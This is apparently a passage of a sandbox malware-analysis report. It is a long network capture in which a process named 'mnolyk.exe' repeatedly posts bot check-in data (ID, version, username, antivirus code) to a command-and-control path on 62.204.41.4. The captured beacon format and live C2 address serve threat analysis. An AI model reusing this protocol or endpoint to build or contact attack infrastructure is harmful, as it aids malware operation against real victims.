                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        177 | 192.168.2.5 | 49867 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:36.742778063 CET | 378 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:36.806961060 CET | 379 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        178 | 192.168.2.5 | 49868 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:36.986361980 CET | 379 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:37.051250935 CET | 380 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        179 | 192.168.2.5 | 49869 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:37.244652033 CET | 380 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:37.309365988 CET | 381 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        18 | 192.168.2.5 | 49708 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:33.047919035 CET | 218 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:33.112329960 CET | 219 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        180 | 192.168.2.5 | 49870 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:37.486432076 CET | 381 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:37.549299002 CET | 382 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        181 | 192.168.2.5 | 49871 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:37.725069046 CET | 382 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:37.788887978 CET | 383 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        182 | 192.168.2.5 | 49872 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:37.956882954 CET | 383 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.021882057 CET | 384 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        183 | 192.168.2.5 | 49873 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:38.196580887 CET | 384 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.263432980 CET | 384 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        184 | 192.168.2.5 | 49874 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:38.440488100 CET | 385 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.503765106 CET | 385 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        185 | 192.168.2.5 | 49875 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:38.674669981 CET | 386 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.739365101 CET | 386 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        186 | 192.168.2.5 | 49876 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:38.908848047 CET | 387 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.973138094 CET | 387 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        187 | 192.168.2.5 | 49877 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:39.154447079 CET | 388 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:39.218770981 CET | 388 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        188 | 192.168.2.5 | 49878 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:39.400319099 CET | 389 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:39.466084957 CET | 389 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        189 | 192.168.2.5 | 49879 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:39.657687902 CET | 390 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:39.721652031 CET | 390 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        19 | 192.168.2.5 | 49709 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:33.287571907 CET | 219 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:33.353867054 CET | 220 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        190 | 192.168.2.5 | 49880 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:39.895059109 CET | 391 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:39.961123943 CET | 391 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        191 | 192.168.2.5 | 49881 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:40.148507118 CET | 392 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:40.217240095 CET | 392 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        192 | 192.168.2.5 | 49882 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:40.393564939 CET | 393 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:40.458098888 CET | 393 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        193 | 192.168.2.5 | 49883 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:40.633558989 CET | 394 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:40.700082064 CET | 394 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        194 | 192.168.2.5 | 49884 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:40.878750086 CET | 395 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
